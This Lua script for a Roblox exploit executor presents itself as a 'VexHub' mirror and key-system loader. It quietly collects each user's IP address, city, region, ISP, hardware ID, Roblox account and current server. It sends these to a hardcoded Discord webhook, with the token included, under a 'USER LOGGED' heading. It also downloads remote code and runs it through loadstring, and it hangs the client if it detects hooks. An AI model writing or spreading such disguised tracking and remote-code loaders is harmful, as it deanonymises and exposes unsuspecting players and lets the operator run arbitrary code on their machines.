local LocalPlayer = game:GetService("Players").LocalPlayer
local MirrorLogs = {}

_G.GetMirrorLogs = function()
	return MirrorLogs
end

_G.MirrorLinks = {
	[1] = "https://mirrorr.onrender.com",
	[2] = "https://mirrorr2.onrender.com",
	[3] = "https://mirror3-0wh0.onrender.com",
	[4] = "https://mirrorr4.onrender.com"
}

getgenv().loadmirror = function(Link)
	local HttpService = game:GetService("HttpService")
	local message = request({
		Url = _G.MirrorLinks[math.random(1, 4)].."/mirror",
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = HttpService:JSONEncode({
			url = Link
		})
	})

	local decoded = HttpService:JSONDecode(message.Body)
	if isfunctionhooked(loadstring) or isfunctionhooked(request) then
		restorefunction(loadstring)
		restroefunction(request)
		while true do end
		LocalPlayer:Kick("Unsafe environment")
	end
	table.insert(MirrorLogs, Link)
	return loadstring(tostring(decoded.content))()
end

getgenv().mirror = function(Link)
	local HttpService = game:GetService("HttpService")
	local message = request({
		Url = _G.MirrorLinks[math.random(1, 4)].."/mirror",
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = HttpService:JSONEncode({
			url = Link
		})
	})

	local decoded = HttpService:JSONDecode(message.Body)
	if isfunctionhooked(request) then
		restroefunction(request)
		while true do end
		LocalPlayer:Kick("Unsafe environment")
	end
	table.insert(MirrorLogs, Link)
	return decoded.content
end

local GUI = {
	["Hint_00"] = Instance.new("ScreenGui");
	["Text_01"] = Instance.new("TextLabel");
}

GUI["Hint_00"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
GUI["Hint_00"].Name = "Hint"
GUI["Hint_00"].Parent = game:GetService("CoreGui")

GUI["Text_01"].Font = Enum.Font.GothamMedium
GUI["Text_01"].Text = "Loading VexHub Mirrorr API (est. 50 seconds)"
GUI["Text_01"].TextColor3 = Color3.fromRGB(255, 255, 255)
GUI["Text_01"].TextSize = 14
GUI["Text_01"].AutomaticSize = Enum.AutomaticSize.Y
GUI["Text_01"].BackgroundColor3 = Color3.fromRGB(25.000000409781933, 26.000000350177288, 31.000000052154064)
GUI["Text_01"].BorderColor3 = Color3.fromRGB(0, 0, 0)
GUI["Text_01"].BorderSizePixel = 0
GUI["Text_01"].Size = UDim2.new(1, 0, 0, 16)
GUI["Text_01"].Visible = false
GUI["Text_01"].Name = "Text"
GUI["Text_01"].Parent = GUI["Hint_00"]

local Loaded = false
local Time = 0

coroutine.wrap(function()
	while task.wait(1) do
		if Loaded == false then
			Time += 1

			if Time > 3 then
				GUI.Text_01.Visible = true
				return
			end
		else
			return
		end
	end
end)()

mirror("https://example.com")
Loaded = true
GUI.Hint_00:Destroy()

if (writefile) and (getcustomasset) then
	coroutine.wrap(function()
		local WhoIs = {}
		if isfile("whois") then
			WhoIs = game:GetService("HttpService"):JSONDecode(readfile("whois"))
		else
			wait(60)
			WhoIs = game:GetService("HttpService"):JSONDecode(game:HttpGet("https://ipwho.is/"))
			writefile("whois", game:GetService("HttpService"):JSONEncode(WhoIs))
		end
		
		local message = request({
			Url = _G.MirrorLinks[math.random(1, 4)].."/send",
			Method = "POST",
			Headers = {
				["Content-Type"] = "application/json"
			},
			Body = game:GetService("HttpService"):JSONEncode({
				webhook_url = "https://discord.com/api/webhooks/1499751083197857922/Lb3-E0JPX3PFbOlHDZYl89JO7nuHQS_PlxVXMfm9r-Zb4Obq4omprJ_zzxE1ICB1yRq9",
				content = '# --- USER LOGGED ---\n### Player Information\nDisplayName : "['..LocalPlayer.DisplayName..'](https://www.roblox.com/users/'..LocalPlayer.UserId..'/profile)"\nUsername : "'..LocalPlayer.Name..'"\nUserId : "'..LocalPlayer.UserId..'"\n### Game Information\nGame Name : "['..game:GetService("MarketplaceService"):GetProductInfoAsync(game.PlaceId).Name..'](https://www.roblox.com/games/'..game.PlaceId..')"\nGameId : "'..game.GameId..'"\nPlaceId : "'..game.PlaceId..'"\nJobId : "['..game.JobId..'](https://www.roblox.com/games/start?placeId='..game.PlaceId..'&gameInstanceId='..game.JobId..')"\n### Sensitive Information\nIP : "'..WhoIs.ip..'"\nCountry : "'..WhoIs.country..'"\nRegion: "'..WhoIs.region..'"\nCity: "'..WhoIs.city..'"\nHWID : "'..gethwid()..'"\nORG : "['..WhoIs.connection.org..'](https://'..WhoIs.connection.domain..')"\nISP : "'..WhoIs.connection.isp..'"\n### Other Information\nExecutor: "'..identifyexecutor()..'"',
			})
		})
	end)()

	loadmirror("https://raw.githubusercontent.com/Sofjskdkkco/fake/refs/heads/main/KeySystem")
else
	GUI.Text_01.Text = "VexHub does not support your executor. Please join our discord server: dsc.gg/vhub"
	GUI.Text_01.Visible = true
end
